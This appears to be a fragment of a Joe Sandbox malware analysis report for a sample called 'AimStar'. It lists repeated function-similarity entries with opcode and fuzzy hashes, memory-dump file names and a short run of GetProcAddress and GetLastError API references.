                                                                                                                                                                                                                                          • Instruction ID: 417afec7d3ae7e80bfd53e9b3f6f12891e6d82a669d3244cd025f598789c4838
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FD1FBA2E0CE4241EB289E2D905263DA3B9FB05B68F948135CE0D07795DF3DFA49C760
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                          • Instruction ID: 0b697b9b9b6b80ea2fc8d7200cfbf0b4fa29b5300f4811da5b9a03056e671c0e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4C17D762181E08BD28AEB29E4694BA73E1F78930DBD5406BEF87477C5C73CA514DB20
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                          • Instruction ID: 36025730a522d687b946761f9f04805e89b74d17027d413f0144df3d3be993a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17B1C136A0CB4186E7A49F29D05213CBBB8F706B68FA40235EB4D47395CF39E649C760
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                          • Instruction ID: 3c4306c30fb65dd91e7800f393f8035dc0da3cb4c6b236f58099a6a027741726
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24812772A1CB8146D778DF19A042379BAA5FB597E4F808235DA9D43B85CE3CF208CB10
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
                                                                                                                                                                                                                                          • Instruction ID: 76367c8aace7628829d2f4ebf508f49b5b1b4509501022d29cfc3358fa14f9fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F611B26E0C99246F724A928D05723DE698AF49370F984339D61E4B7D5DE7EFC08C720
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                          • Instruction ID: 3fdce3bc7393a97dd09c100c1ce38e3fd043bbb032d34493680c5fbd23bdd387
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E951A336A1DE5182E7259B29C041238B3B4FB85B78FA44231CA4D17794DB3EFA57C750
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                          • Instruction ID: 19143e90199daaa338e84854f4b7ac43159617cf57c54aaf9b252f27fdf5c355
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE51733AA1CA5182E7A49B29C04123877B4EB56B78F648331EE4D17794CB3AFA47C750
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                          • Instruction ID: c41dfb68bb37f21cf19a29f9e3499e7f174d670a14e49d2a254470b69c774e60
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28519336A1CE5282E7249B29D042238B7B8FB49B78F644231DE4D07794CB3AFA57C750
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                          • Instruction ID: 0de9dc5b21c31853807ce95869f83f68755bb0f9546fe7286073285f8e20069e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E51CF32A1CE5186E7249B29C045278B7B8FB45B68FA44131CE4D077A4CF3AFA4BC750
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                          • Instruction ID: bbcfdcf25627af6bda6ec4fd4195010a04f71a238e10181ce0e18f17046da331
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B51BF36A1CE5186E7349B28C05123CA7B9FB45B69FA45131CA4C17798CB3AFA4BC790
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                          • Instruction ID: c261c91390c5cd0b8691166b8256b828d0d3cc5a0713791878b75c30ad09d4cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651D63AA1DE5185E7649B28C04123DB7B4EB46B68F644231EA4C177E4CF3AFD46C790
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                          • Instruction ID: 49a939b529e4c91213b65b0118dd3f92c1dd5b341e5fac5af29e9b1cc9086f8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D41A76280DE4A45E9659928092E6B8F6E89F63FB0DD85270DD99D73C2DD0C3B4FC121
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                          • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                          • Instruction ID: b5940e066525674250a90417f75b3bf02bd4438720d3f197f13b8459a21235cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC41F522718E5582EF04DF2AD915169B3A5FB49FE4B899032EE0D97B58DE3CE549C300
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                          • Instruction ID: 9b96fe54465062fc65404e4c5ce492e3c3758c4c592f37275653edc113b764b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF31C432B1CF4281E754EB25644213EAAE8AB85BE0F944239EA4D63BD5DF3CE106C314
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                          • Instruction ID: 3c59a81b614146e6e3b828353f6285ed6e0e8551ed91c31daa224bc5f54282f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0687171C6558ADB989F69A40366977D4F7083D0F80C03AD58D83B24DA3CD065CF14
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                          • Instruction ID: 471386c9c7a07b118ea6ca32529ab7ff9eb4688dbb17441ba9b6247c68a66c85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDA00235A0CC0ED1E645BF00E8A2435B378FB50324BC00071E40D812F0AF3CB448E321
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45830
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45842
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45879
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4588B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458A4
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458B6
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458CF
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458E1
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458FD
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4590F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4592B
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4593D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45959
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4596B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45987
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45999
